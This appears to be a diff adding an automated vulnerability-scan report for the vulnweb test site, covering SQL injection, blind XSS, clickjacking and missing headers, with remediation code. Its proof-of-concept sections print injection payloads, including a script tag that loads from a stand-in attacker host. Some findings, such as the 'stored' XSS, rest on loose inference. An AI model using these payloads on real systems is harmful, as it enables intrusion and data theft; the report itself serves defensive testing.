+                    <p><strong>Impact:</strong> This SQL injection vulnerability poses a critical security risk to the organization. An attacker could exploit this vulnerability to extract sensitive data from the entire database, including customer information, user credentials, financial records, and proprietary business data. The attacker could potentially escalate privileges, modify or delete database contents, and in some cases, execute operating system commands on the database server.
+
+The business impact could be severe, including data breaches leading to regulatory fines under GDPR, PCI-DSS violations if payment card data is involved, loss of customer trust, competitive disadvantage from stolen intellectual property, and potential legal liability. Given that this is a public-facing web application, the vulnerability could be exploited by remote attackers without authentication, significantly increasing the risk exposure. The ability to perform UNION-based attacks suggests that sensitive data could be systematically extracted through automated tools, making this a high-priority security concern requiring immediate remediation.</p>
+                    
+                <div class="poc-section">
+                    <h4>Proof of Concept</h4>
+                    <div class="ohvr-section">
+                        <h5>Observation</h5>
+                        <p>A Union-based SQL injection vulnerability was identified in the listproducts.php endpoint of the target application. The vulnerability exists in the &#39;cat&#39; parameter, which is directly incorporated into SQL queries without proper sanitization or parameterization. During testing, the payload &#39; UNION SELECT NULL-- was successfully injected, triggering distinct SQL error messages that confirmed the presence of the vulnerability.
+
+Union-based SQL injection attacks exploit improperly sanitized user input to manipulate SQL queries by injecting UNION statements. This technique allows attackers to combine results from the original query with results from attacker-controlled queries, enabling data extraction from arbitrary database tables. The observed error patterns indicate that the application is directly concatenating user input into SQL statements, creating a classic injection point.
+
+In this specific context, the cat parameter appears to be used for filtering product categories, likely through a WHERE clause in the underlying SQL query. The successful injection of the UNION SELECT payload demonstrates that an attacker can break out of the original query context and execute arbitrary SQL commands with the same privileges as the application&#39;s database user.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Hypothesis</h5>
+                        <p>The endpoint may be vulnerable to sqli_union based on observed behavior.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Validation</h5>
+                        <div class="code-block"><pre>&#39; UNION SELECT NULL--</pre></div>
+                        
+                        
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Result</h5>
+                        <p>This SQL injection vulnerability poses a critical security risk to the organization. An attacker could exploit this vulnerability to extract sensitive data from the entire database, including customer information, user credentials, financial records, and proprietary business data. The attacker could potentially escalate privileges, modify or delete database contents, and in some cases, execute operating system commands on the database server.
+
+The business impact could be severe, including data breaches leading to regulatory fines under GDPR, PCI-DSS violations if payment card data is involved, loss of customer trust, competitive disadvantage from stolen intellectual property, and potential legal liability. Given that this is a public-facing web application, the vulnerability could be exploited by remote attackers without authentication, significantly increasing the risk exposure. The ability to perform UNION-based attacks suggests that sensitive data could be systematically extracted through automated tools, making this a high-priority security concern requiring immediate remediation.</p>
+                    </div>
+                </div>
+                
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Parameterized Queries (Prepared Statements)**: Replace all dynamic SQL queries with parameterized queries or prepared statements. For PHP applications, use PDO prepared statements or MySQLi prepared statements:
+
+```php
+// Vulnerable code:
+$query = &quot;SELECT * FROM products WHERE category = &#39;&quot; . $_GET[&#39;cat&#39;] . &quot;&#39;&quot;;
+
+// Secure code:
+$stmt = $pdo-&gt;prepare(&quot;SELECT * FROM products WHERE category = ?&quot;);
+$stmt-&gt;execute([$_GET[&#39;cat&#39;]]);
+```
+
+2. **Input Validation and Sanitization**: Implement strict input validation on all user-supplied data. Use allowlisting for expected values where possible:
+
+```php
+$allowed_categories = [&#39;electronics&#39;, &#39;books&#39;, &#39;clothing&#39;];
+if (!in_array($_GET[&#39;cat&#39;], $allowed_categories)) {
+    throw new InvalidArgumentException(&#39;Invalid category&#39;);
+}
+```
+
+3. **Implement Stored Procedures**: Where applicable, use stored procedures to encapsulate database logic and reduce direct SQL construction in application code.
+
+4. **Apply Principle of Least Privilege**: Configure database user accounts with minimal necessary permissions. The web application should not use administrative database accounts.
+
+5. **Enable SQL Injection Detection**: Implement Web Application Firewall (WAF) rules to detect and block SQL injection attempts. Use tools like ModSecurity with OWASP Core Rule Set.
+
+6. **Error Handling**: Implement generic error pages that don&#39;t reveal database structure or technical details to end users. Log detailed errors server-side for debugging purposes.
+
+7. **Regular Security Testing**: Conduct regular code reviews, static analysis scanning (SAST), and dynamic testing (DAST) to identify injection vulnerabilities during development.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #fd7e14;">HIGH</span>
+                    <h3>Blind SQL Injection (Boolean-based)</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> sqli_blind</span>
+                    <span><strong>CWE:</strong> CWE-89</span>
+                    <span><strong>CVSS:</strong> 7.5</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=&#39;+AND+1%3D1--</p>
+                    <p><strong>Description:</strong> A blind SQL injection vulnerability was identified in the &#39;cat&#39; parameter of the listproducts.php endpoint on the target application. This vulnerability allows an attacker to inject malicious SQL code that is executed by the backend database without direct error messages or data being returned in the response. The vulnerability was confirmed through boolean-based blind SQL injection techniques, where different SQL conditions produced varying response behaviors from the application.
+
+The exploitation technique relies on crafting SQL payloads that evaluate to true or false conditions, allowing an attacker to infer information about the database structure and contents based on the application&#39;s response patterns. In this case, the payload &#39;AND 1=1--&#39; was successfully injected, and the application exhibited different behavior patterns that confirmed the presence of SQL injection. The error patterns observed in the response suggest that the injected SQL syntax is being processed by the database engine, indicating that user input is being directly concatenated into SQL queries without proper sanitization.
+
+This vulnerability exists in a web application parameter that appears to handle product category filtering functionality. The lack of input validation and parameterized query usage allows malicious SQL code to be interpreted as part of the legitimate database query, compromising the security of the underlying database system.</p>
+                    <p><strong>Impact:</strong> An attacker exploiting this blind SQL injection vulnerability could systematically extract sensitive information from the backend database, including user credentials, personal identifiable information (PII), financial records, and proprietary business data. Through time-based or boolean-based blind injection techniques, an attacker could enumerate database schemas, table structures, and extract data row by row. In worst-case scenarios, depending on database permissions and configuration, an attacker might achieve administrative database access, potentially leading to complete database compromise, data manipulation, or deletion of critical business information.
+
+From a business perspective, this vulnerability poses significant risks including data breaches that could result in regulatory fines under compliance frameworks such as PCI-DSS (if payment card data is stored), GDPR (for EU personal data), HIPAA (for healthcare information), or other applicable data protection regulations. The reputational damage from a data breach, combined with potential legal liabilities and business disruption, could have lasting financial and operational impacts. Additionally, if the database contains customer information or intellectual property, competitors could gain unfair business advantages through unauthorized data access.</p>
+                    
+                <div class="poc-section">
+                    <h4>Proof of Concept</h4>
+                    <div class="ohvr-section">
+                        <h5>Observation</h5>
+                        <p>A blind SQL injection vulnerability was identified in the &#39;cat&#39; parameter of the listproducts.php endpoint on the target application. This vulnerability allows an attacker to inject malicious SQL code that is executed by the backend database without direct error messages or data being returned in the response. The vulnerability was confirmed through boolean-based blind SQL injection techniques, where different SQL conditions produced varying response behaviors from the application.
+
+The exploitation technique relies on crafting SQL payloads that evaluate to true or false conditions, allowing an attacker to infer information about the database structure and contents based on the application&#39;s response patterns. In this case, the payload &#39;AND 1=1--&#39; was successfully injected, and the application exhibited different behavior patterns that confirmed the presence of SQL injection. The error patterns observed in the response suggest that the injected SQL syntax is being processed by the database engine, indicating that user input is being directly concatenated into SQL queries without proper sanitization.
+
+This vulnerability exists in a web application parameter that appears to handle product category filtering functionality. The lack of input validation and parameterized query usage allows malicious SQL code to be interpreted as part of the legitimate database query, compromising the security of the underlying database system.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Hypothesis</h5>
+                        <p>The endpoint may be vulnerable to sqli_blind based on observed behavior.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Validation</h5>
+                        <div class="code-block"><pre>&#39; AND 1=1--</pre></div>
+                        
+                        
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Result</h5>
+                        <p>An attacker exploiting this blind SQL injection vulnerability could systematically extract sensitive information from the backend database, including user credentials, personal identifiable information (PII), financial records, and proprietary business data. Through time-based or boolean-based blind injection techniques, an attacker could enumerate database schemas, table structures, and extract data row by row. In worst-case scenarios, depending on database permissions and configuration, an attacker might achieve administrative database access, potentially leading to complete database compromise, data manipulation, or deletion of critical business information.
+
+From a business perspective, this vulnerability poses significant risks including data breaches that could result in regulatory fines under compliance frameworks such as PCI-DSS (if payment card data is stored), GDPR (for EU personal data), HIPAA (for healthcare information), or other applicable data protection regulations. The reputational damage from a data breach, combined with potential legal liabilities and business disruption, could have lasting financial and operational impacts. Additionally, if the database contains customer information or intellectual property, competitors could gain unfair business advantages through unauthorized data access.</p>
+                    </div>
+                </div>
+                
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Parameterized Queries/Prepared Statements**: Replace all dynamic SQL query construction with parameterized queries or prepared statements. For PHP applications, use PDO with parameter binding:
+```php
+$stmt = $pdo-&gt;prepare(&#39;SELECT * FROM products WHERE category_id = ?&#39;);
+$stmt-&gt;execute([$_GET[&#39;cat&#39;]]);
+```
+
+2. **Input Validation and Sanitization**: Implement strict input validation on the &#39;cat&#39; parameter to ensure it only accepts expected integer values for category IDs. Use whitelisting rather than blacklisting approaches:
+```php
+$cat = filter_input(INPUT_GET, &#39;cat&#39;, FILTER_VALIDATE_INT);
+if ($cat === false || $cat &lt; 1) {
+    // Handle invalid input
+    exit(&#39;Invalid category parameter&#39;);
+}
+```
+
+3. **Apply Least Privilege Principle**: Configure database user accounts used by the application with minimal necessary permissions. Remove unnecessary privileges such as DROP, CREATE, or administrative functions from application database users.
+
+4. **Implement Web Application Firewall (WAF)**: Deploy a WAF with SQL injection detection rules to provide an additional layer of protection against injection attempts.
+
+5. **Enable Database Query Logging**: Configure database logging to monitor and alert on suspicious query patterns that might indicate injection attempts.
+
+6. **Regular Security Code Reviews**: Implement mandatory security code reviews focusing on data access layers and user input handling to identify similar vulnerabilities before deployment.
+
+7. **Use ORM Frameworks**: Consider migrating to Object-Relational Mapping (ORM) frameworks that provide built-in protection against SQL injection when used correctly.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #fd7e14;">HIGH</span>
+                    <h3>Time-based Blind SQL Injection</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> sqli_time</span>
+                    <span><strong>CWE:</strong> CWE-89</span>
+                    <span><strong>CVSS:</strong> 7.5</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=&#39;%3B+WAITFOR+DELAY+&#39;0:0:5&#39;--</p>
+                    <p><strong>Description:</strong> A time-based blind SQL injection vulnerability was identified in the listproducts.php endpoint of the target application. The vulnerability exists in the &#39;cat&#39; parameter, which accepts user input that is directly incorporated into SQL queries without proper sanitization or parameterization. Through systematic testing, it was confirmed that malicious SQL syntax including time delay functions can be injected to manipulate the database query execution.
+
+The vulnerability was confirmed using a WAITFOR DELAY payload that introduces a deliberate 5-second delay in the SQL query execution. This time-based technique is particularly effective for blind SQL injection attacks where error messages or query results are not directly visible to the attacker. The application&#39;s response time differential (normal vs. delayed responses) serves as a reliable indicator of successful SQL injection, allowing attackers to extract sensitive information through boolean-based logical queries.
+
+The specific payload &#39;; WAITFOR DELAY &#39;0:0:5&#39;-- successfully triggered the time delay, confirming that the application is running on a Microsoft SQL Server backend and that the injected SQL syntax is being executed within the database context. The error patterns observed in the application responses further validate the presence of SQL syntax errors, indicating insufficient input validation and improper error handling.</p>
+                    <p><strong>Impact:</strong> This SQL injection vulnerability poses significant risks to the organization&#39;s data security and regulatory compliance. An attacker can exploit this vulnerability to extract sensitive information from the database including user credentials, personal identifiable information (PII), financial records, and proprietary business data. Through time-based blind injection techniques, attackers can systematically enumerate database schemas, extract table contents, and potentially gain administrative access to the database server.
+
+The worst-case scenario includes complete database compromise, leading to unauthorized access to all stored data, potential data exfiltration, and possible lateral movement within the internal network if database credentials are reused. This vulnerability also creates significant compliance risks under regulations such as PCI-DSS (if payment card data is stored), GDPR (for personal data of EU residents), and HIPAA (if healthcare information is involved). Data breach notification requirements, regulatory fines, and reputational damage are likely consequences if this vulnerability is exploited by malicious actors.</p>
+                    
+                <div class="poc-section">
+                    <h4>Proof of Concept</h4>
+                    <div class="ohvr-section">
+                        <h5>Observation</h5>
+                        <p>A time-based blind SQL injection vulnerability was identified in the listproducts.php endpoint of the target application. The vulnerability exists in the &#39;cat&#39; parameter, which accepts user input that is directly incorporated into SQL queries without proper sanitization or parameterization. Through systematic testing, it was confirmed that malicious SQL syntax including time delay functions can be injected to manipulate the database query execution.
+
+The vulnerability was confirmed using a WAITFOR DELAY payload that introduces a deliberate 5-second delay in the SQL query execution. This time-based technique is particularly effective for blind SQL injection attacks where error messages or query results are not directly visible to the attacker. The application&#39;s response time differential (normal vs. delayed responses) serves as a reliable indicator of successful SQL injection, allowing attackers to extract sensitive information through boolean-based logical queries.
+
+The specific payload &#39;; WAITFOR DELAY &#39;0:0:5&#39;-- successfully triggered the time delay, confirming that the application is running on a Microsoft SQL Server backend and that the injected SQL syntax is being executed within the database context. The error patterns observed in the application responses further validate the presence of SQL syntax errors, indicating insufficient input validation and improper error handling.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Hypothesis</h5>
+                        <p>The endpoint may be vulnerable to sqli_time based on observed behavior.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Validation</h5>
+                        <div class="code-block"><pre>&#39;; WAITFOR DELAY &#39;0:0:5&#39;--</pre></div>
+                        
+                        
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Result</h5>
+                        <p>This SQL injection vulnerability poses significant risks to the organization&#39;s data security and regulatory compliance. An attacker can exploit this vulnerability to extract sensitive information from the database including user credentials, personal identifiable information (PII), financial records, and proprietary business data. Through time-based blind injection techniques, attackers can systematically enumerate database schemas, extract table contents, and potentially gain administrative access to the database server.
+
+The worst-case scenario includes complete database compromise, leading to unauthorized access to all stored data, potential data exfiltration, and possible lateral movement within the internal network if database credentials are reused. This vulnerability also creates significant compliance risks under regulations such as PCI-DSS (if payment card data is stored), GDPR (for personal data of EU residents), and HIPAA (if healthcare information is involved). Data breach notification requirements, regulatory fines, and reputational damage are likely consequences if this vulnerability is exploited by malicious actors.</p>
+                    </div>
+                </div>
+                
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Parameterized Queries/Prepared Statements**: Replace dynamic SQL construction with parameterized queries. For PHP applications, use PDO or MySQLi with bound parameters:
+
+```php
+// Vulnerable code:
+$query = &quot;SELECT * FROM products WHERE category = &#39;&quot; . $_GET[&#39;cat&#39;] . &quot;&#39;&quot;;
+
+// Secure code:
+$stmt = $pdo-&gt;prepare(&quot;SELECT * FROM products WHERE category = ?&quot;);
+$stmt-&gt;execute([$_GET[&#39;cat&#39;]]);
+```
+
+2. **Input Validation and Sanitization**: Implement strict input validation on the server-side. Use allowlists for expected values and reject any input containing SQL metacharacters:
+
+```php
+$cat = filter_input(INPUT_GET, &#39;cat&#39;, FILTER_VALIDATE_INT);
+if ($cat === false || $cat &lt; 1) {
+    die(&#39;Invalid category ID&#39;);
+}
+```
+
+3. **Implement Stored Procedures**: Use stored procedures with parameterized inputs to create an additional layer of separation between code and data.
+
+4. **Database Security Hardening**: Apply the principle of least privilege by creating dedicated database users with minimal required permissions. Remove unnecessary database features like xp_cmdshell and disable error message disclosure in production.
+
+5. **Web Application Firewall (WAF)**: Deploy a WAF with SQL injection detection rules as a defense-in-depth measure, though this should not be the primary mitigation strategy.
+
+6. **Regular Security Testing**: Implement automated security testing in the CI/CD pipeline and conduct regular penetration testing to identify similar vulnerabilities.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #fd7e14;">HIGH</span>
+                    <h3>Blind Cross-Site Scripting</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> blind_xss</span>
+                    <span><strong>CWE:</strong> CWE-79</span>
+                    <span><strong>CVSS:</strong> 8.8</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=%3Cscript+src%3D//callback.attacker.com%3E%3C/script%3E</p>
+                    <p><strong>Description:</strong> A Blind Cross-Site Scripting (XSS) vulnerability was identified in the product listing functionality of the web application. The vulnerability exists in the &#39;cat&#39; parameter of the listproducts.php endpoint, where user-supplied input is stored and later rendered in web pages viewed by other users without proper sanitization or encoding. Unlike reflected XSS, this blind/stored variant persists the malicious payload in the application&#39;s data store, making it more dangerous as it affects multiple users over time.
+
+The vulnerability was confirmed by injecting a JavaScript payload that references an external script hosted at &#39;callback.attacker.com&#39;. When the payload is processed and stored by the application, it gets executed in the browsers of users who subsequently view the affected page. The payload successfully bypassed the application&#39;s input validation mechanisms, indicating insufficient server-side security controls. Additionally, error patterns suggesting potential SQL injection vulnerabilities were observed, indicating the parameter may be susceptible to multiple attack vectors.
+
+This particular implementation appears to store user input directly into a database or file system without proper sanitization, and then renders this content in HTML responses without appropriate output encoding. The blind nature of this XSS means that the payload execution occurs asynchronously, making detection more challenging and allowing attackers to maintain persistence within the application.</p>
+                    <p><strong>Impact:</strong> The impact of this stored XSS vulnerability is severe and multifaceted. Attackers can execute arbitrary JavaScript code in the browsers of legitimate users, leading to complete session hijacking through cookie theft, credential harvesting via fake login forms, and unauthorized actions performed on behalf of victims. In an enterprise environment, this could result in privilege escalation if administrative users are targeted, potentially compromising entire systems and sensitive business data.
+
+The persistent nature of stored XSS means that every user visiting the affected product listing page will execute the malicious script, creating a widespread attack vector that could affect hundreds or thousands of users. Attackers could establish persistent access to user accounts, steal sensitive information including personal data, financial details, and proprietary business information. The vulnerability could also be leveraged to distribute malware, perform internal network reconnaissance, or establish Command and Control (C2) communications.
+
+From a compliance perspective, this vulnerability poses significant risks under regulations such as PCI-DSS (if payment card data is accessible), GDPR (due to potential personal data exposure), HIPAA (in healthcare environments), and SOX (for publicly traded companies). The ability to execute arbitrary code in user browsers could lead to data breaches resulting in regulatory fines, legal liability, reputational damage, and loss of customer trust. Organizations may face mandatory breach notifications and potential lawsuits from affected users.</p>
+                    
+                <div class="poc-section">
+                    <h4>Proof of Concept</h4>
+                    <div class="ohvr-section">
+                        <h5>Observation</h5>
+                        <p>A Blind Cross-Site Scripting (XSS) vulnerability was identified in the product listing functionality of the web application. The vulnerability exists in the &#39;cat&#39; parameter of the listproducts.php endpoint, where user-supplied input is stored and later rendered in web pages viewed by other users without proper sanitization or encoding. Unlike reflected XSS, this blind/stored variant persists the malicious payload in the application&#39;s data store, making it more dangerous as it affects multiple users over time.
+
+The vulnerability was confirmed by injecting a JavaScript payload that references an external script hosted at &#39;callback.attacker.com&#39;. When the payload is processed and stored by the application, it gets executed in the browsers of users who subsequently view the affected page. The payload successfully bypassed the application&#39;s input validation mechanisms, indicating insufficient server-side security controls. Additionally, error patterns suggesting potential SQL injection vulnerabilities were observed, indicating the parameter may be susceptible to multiple attack vectors.
+
+This particular implementation appears to store user input directly into a database or file system without proper sanitization, and then renders this content in HTML responses without appropriate output encoding. The blind nature of this XSS means that the payload execution occurs asynchronously, making detection more challenging and allowing attackers to maintain persistence within the application.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Hypothesis</h5>
+                        <p>The endpoint may be vulnerable to blind_xss based on observed behavior.</p>
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Validation</h5>
+                        <div class="code-block"><pre>&lt;script src=//callback.attacker.com&gt;&lt;/script&gt;</pre></div>
+                        
+                        
+                    </div>
+                    <div class="ohvr-section">
+                        <h5>Result</h5>
+                        <p>The impact of this stored XSS vulnerability is severe and multifaceted. Attackers can execute arbitrary JavaScript code in the browsers of legitimate users, leading to complete session hijacking through cookie theft, credential harvesting via fake login forms, and unauthorized actions performed on behalf of victims. In an enterprise environment, this could result in privilege escalation if administrative users are targeted, potentially compromising entire systems and sensitive business data.
+
+The persistent nature of stored XSS means that every user visiting the affected product listing page will execute the malicious script, creating a widespread attack vector that could affect hundreds or thousands of users. Attackers could establish persistent access to user accounts, steal sensitive information including personal data, financial details, and proprietary business information. The vulnerability could also be leveraged to distribute malware, perform internal network reconnaissance, or establish Command and Control (C2) communications.
+
+From a compliance perspective, this vulnerability poses significant risks under regulations such as PCI-DSS (if payment card data is accessible), GDPR (due to potential personal data exposure), HIPAA (in healthcare environments), and SOX (for publicly traded companies). The ability to execute arbitrary code in user browsers could lead to data breaches resulting in regulatory fines, legal liability, reputational damage, and loss of customer trust. Organizations may face mandatory breach notifications and potential lawsuits from affected users.</p>
+                    </div>
+                </div>
+                
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement Proper Input Sanitization and Output Encoding:**
+   - Sanitize all user input on the server-side using allowlist validation
+   - Implement context-appropriate output encoding (HTML entity encoding for HTML context, JavaScript encoding for JS context)
+   - Example PHP code:
+   ```php
+   // Input sanitization
+   $cat_param = filter_input(INPUT_GET, &#39;cat&#39;, FILTER_SANITIZE_STRING, FILTER_FLAG_STRIP_HIGH);
+   
+   // Output encoding
+   echo htmlspecialchars($cat_param, ENT_QUOTES | ENT_HTML5, &#39;UTF-8&#39;);
+   ```
+
+2. **Deploy Content Security Policy (CSP):**
+   - Implement a strict CSP header to prevent execution of inline scripts and restrict script sources
+   - Example CSP header: `Content-Security-Policy: default-src &#39;self&#39;; script-src &#39;self&#39;; object-src &#39;none&#39;; base-uri &#39;self&#39;;`
+   - This provides defense-in-depth even if XSS payloads bypass other controls
+
+3. **Use Prepared Statements and Parameterized Queries:**
+   - Given the SQL error patterns observed, ensure all database queries use prepared statements
+   - Example PHP PDO implementation:
+   ```php
+   $stmt = $pdo-&gt;prepare(&quot;SELECT * FROM products WHERE category = :cat&quot;);
+   $stmt-&gt;bindParam(&#39;:cat&#39;, $cat_param, PDO::PARAM_STR);
+   $stmt-&gt;execute();
+   ```
+
+4. **Implement Web Application Firewall (WAF):**
+   - Deploy a WAF with rules to detect and block XSS and SQL injection attempts
+   - Configure custom rules for the specific application patterns
+   - Regularly update WAF rulesets to address new attack vectors
+
+5. **Security Headers and Browser Protections:**
+   - Implement X-XSS-Protection, X-Content-Type-Options, and X-Frame-Options headers
+   - Use HTTPOnly and Secure flags on all session cookies
+   - Implement proper CORS policies to restrict cross-origin requests
+
+6. **Regular Security Testing:**
+   - Implement automated security scanning in the CI/CD pipeline
+   - Conduct regular penetration testing focusing on injection vulnerabilities
+   - Use static and dynamic application security testing (SAST/DAST) tools</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Clickjacking</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> clickjacking</span>
+                    <span><strong>CWE:</strong> CWE-1021</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
+                    <p><strong>Description:</strong> A clickjacking vulnerability was identified on the target application at http://testphp.vulnweb.com/. This vulnerability exists due to the absence of proper frame-busting protections, specifically the lack of X-Frame-Options header and Content Security Policy (CSP) frame-ancestors directive. The application can be successfully embedded within an HTML iframe, allowing malicious websites to overlay the legitimate application with deceptive content or transparent layers.
+
+Clickjacking attacks, also known as UI redress attacks, work by tricking users into clicking on elements of the vulnerable application while believing they are interacting with a different interface. An attacker can create a malicious webpage that loads the target application in an invisible or disguised iframe, then position clickable elements over the legitimate application&#39;s buttons or links. When users attempt to interact with what appears to be the attacker&#39;s interface, they unknowingly perform actions on the underlying legitimate application.
+
+In the context of this specific application, the vulnerability was confirmed by observing that HTTP responses lack the X-Frame-Options security header and do not implement Content Security Policy frame-ancestors directive. This means the application provides no browser-level protection against being embedded in frames by third-party websites, making it fully susceptible to clickjacking attacks.</p>
+                    <p><strong>Impact:</strong> The clickjacking vulnerability could enable attackers to perform unauthorized actions on behalf of authenticated users without their knowledge or consent. Potential impacts include unauthorized form submissions, unintended purchases or financial transactions, modification of user account settings, or disclosure of sensitive information through social engineering. In applications handling sensitive data or financial transactions, this could lead to significant financial losses or privacy breaches.
+
+From a compliance perspective, this vulnerability may violate security requirements under regulations such as PCI-DSS (particularly requirements 6.5.1 regarding injection flaws and 11.3.2 for application security testing), and could potentially impact GDPR compliance if personal data processing occurs through clickjacked actions. The reputational damage from successful clickjacking attacks could also result in loss of customer trust and potential legal liability, especially if sensitive user actions are performed without proper authorization.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement X-Frame-Options Header**: Configure the web server or application to send the X-Frame-Options header with appropriate values:
+   - `X-Frame-Options: DENY` - Prevents the page from being embedded in any frame
+   - `X-Frame-Options: SAMEORIGIN` - Allows framing only by pages from the same origin
+   - `X-Frame-Options: ALLOW-FROM https://trusted-domain.com` - Allows framing only from specific domains (deprecated)
+
+2. **Deploy Content Security Policy (CSP)**: Implement a robust CSP with frame-ancestors directive:
+   - `Content-Security-Policy: frame-ancestors &#39;none&#39;;` - Equivalent to X-Frame-Options: DENY
+   - `Content-Security-Policy: frame-ancestors &#39;self&#39;;` - Equivalent to X-Frame-Options: SAMEORIGIN
+   - `Content-Security-Policy: frame-ancestors &#39;self&#39; https://trusted-domain.com;` - Allow specific trusted domains
+
+3. **Server Configuration Examples**:
+   - **Apache**: Add `Header always set X-Frame-Options &quot;DENY&quot;` to .htaccess or virtual host configuration
+   - **Nginx**: Add `add_header X-Frame-Options &quot;DENY&quot; always;` to server configuration
+   - **Application Level**: Set headers programmatically in application code before sending responses
+
+4. **JavaScript Frame-Busting (Defense in Depth)**: Implement client-side frame-busting code as an additional layer:
+   ```javascript
+   if (top !== self) {
+       top.location = self.location;
+   }
+   ```
+
+5. **Regular Security Testing**: Implement automated security testing to verify frame protection headers are properly configured across all application endpoints and ensure they remain in place during application updates.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Xcto</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_xcto</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
+                    <p><strong>Description:</strong> The web application at http://testphp.vulnweb.com/ is missing the X-Content-Type-Options security header. This header is a critical security control that prevents browsers from performing MIME type sniffing, which can lead to content type confusion attacks. When this header is not present, browsers may interpret files differently than intended by the server, potentially executing malicious content.
+
+The absence of the X-Content-Type-Options header was confirmed through HTTP response analysis, where the header was completely missing from server responses. This creates an opportunity for attackers to upload files with misleading extensions or content types that could be interpreted and executed as different file types by the browser, bypassing content security policies and potentially leading to cross-site scripting (XSS) attacks.
+
+In the context of this application, the missing header increases the attack surface for content-based attacks, particularly in scenarios where user-generated content is served or file uploads are permitted. This vulnerability is especially concerning for web applications that handle file uploads or serve user-controlled content, as it removes a fundamental browser security mechanism.</p>
+                    <p><strong>Impact:</strong> The absence of the X-Content-Type-Options header can lead to several security risks with moderate business impact. Attackers could potentially exploit MIME type confusion to execute malicious scripts in the context of the application, leading to cross-site scripting attacks that could compromise user sessions, steal sensitive information, or perform unauthorized actions on behalf of legitimate users. In file upload scenarios, attackers might upload files with deceptive extensions that browsers interpret as executable content, bypassing basic file type restrictions.
+
+While this vulnerability alone may not provide direct system compromise, it significantly weakens the application&#39;s defense-in-depth security posture and can be chained with other vulnerabilities to increase attack impact. From a compliance perspective, organizations subject to security frameworks like PCI-DSS, SOC 2, or industry-specific regulations may face audit findings for inadequate security header implementation, as these frameworks increasingly emphasize comprehensive security controls including HTTP security headers.</p>
+                    
+                    
+                <div class="remediation-section">
+                    <h4>Remediation</h4>
+                    <p>1. **Implement X-Content-Type-Options Header**: Add the X-Content-Type-Options header with the value &#39;nosniff&#39; to all HTTP responses. This can be implemented at the web server level, application level, or through a web application firewall.
+
+**Apache Configuration (.htaccess or httpd.conf):**
+```apache
+Header always set X-Content-Type-Options nosniff
+```
+
+**Nginx Configuration:**
+```nginx
+add_header X-Content-Type-Options nosniff always;
+```
+
+**Application Level (PHP example):**
+```php
+header(&#39;X-Content-Type-Options: nosniff&#39;);
+```
+
+2. **Implement Comprehensive Security Headers**: Deploy a complete set of HTTP security headers including Content Security Policy (CSP), X-Frame-Options, X-XSS-Protection, and Strict-Transport-Security to create defense-in-depth protection.
+
+3. **Content Type Validation**: Implement strict server-side content type validation for all file uploads and user-generated content. Ensure that Content-Type headers are explicitly set and match the actual file content through file signature verification.
+
+4. **Regular Security Header Auditing**: Implement automated testing to regularly verify the presence and correct configuration of security headers across all application endpoints and environments.</p>
+                </div>
+                
+                </div>
+            </div>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #ffc107;">MEDIUM</span>
+                    <h3>Missing Csp</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> missing_csp</span>
+                    <span><strong>CWE:</strong> CWE-693</span>
+                    <span><strong>CVSS:</strong> 4.3</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/</p>
